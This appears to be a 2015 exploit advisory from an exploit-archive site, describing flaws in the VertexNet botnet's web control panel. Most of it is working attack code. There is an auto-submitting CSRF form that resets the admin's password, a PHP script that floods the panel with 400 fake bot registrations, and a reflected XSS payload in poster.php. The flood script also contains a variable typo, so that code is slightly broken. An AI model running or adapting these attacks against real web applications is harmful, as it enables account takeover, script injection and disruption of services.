VertexNet botnet v1.1 multi vulnerability

2015.12.05
Credit: alqnas eslam
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: VertexNet botnet v1.1 multi vulnerability # Date: 3-12-2015 # Exploit Author: alqnas eslam # Vendor Homepage:fb.com/alqnas4 # Software Link: http://darkcomet-rat.com/ # Tested on:windows or linux 1- csrf change password and setting: save this code in html file and send it to admin when he open it the setting will be changed <body onload="document.alqnas.submit()"> <form action="http://localhost/panel/index.php?page=set" method="post" name="alqnas"> <input type="text" name="maxusers" value="15" /> <input type="text" name="userswidth" value="400" /> <input type="text" name="showgeo" value="y" /> <input type="text" name="showoff" value="y" /> <input type="text" name="username" value="admin" /> <input type="text" name="password" value="alqnas" /> <input type="submit" /> </form> </body> 2- bots flood: you can do flood bots by this code run it with php <?php $i =1; function adduser($url) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); $output=curl_exec($ch); curl_close($ch); return $output; } //400 are numbers you will send it while ( $i <=400){ $rand = substr( $d , 0 , 5 ); $shuf = substr( $a , 0 , 5 ); $d = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789"); $a = str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789"); //change localhost to url of bot echo adduser("http://localhost/Panel/adduser.php?uid=$rand&cmpname=$suf&country=$rand&cc=$shuf&idle=$rand&lan=$rand&ver=$shuf"); $i++; } ?> 3- cross site scripting (xss) in file poster.php prametar uid not fillter from html code so we can do xss attack http://localhost/Panel/poster.php?uid="><script>alert(/xss/)</script>


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top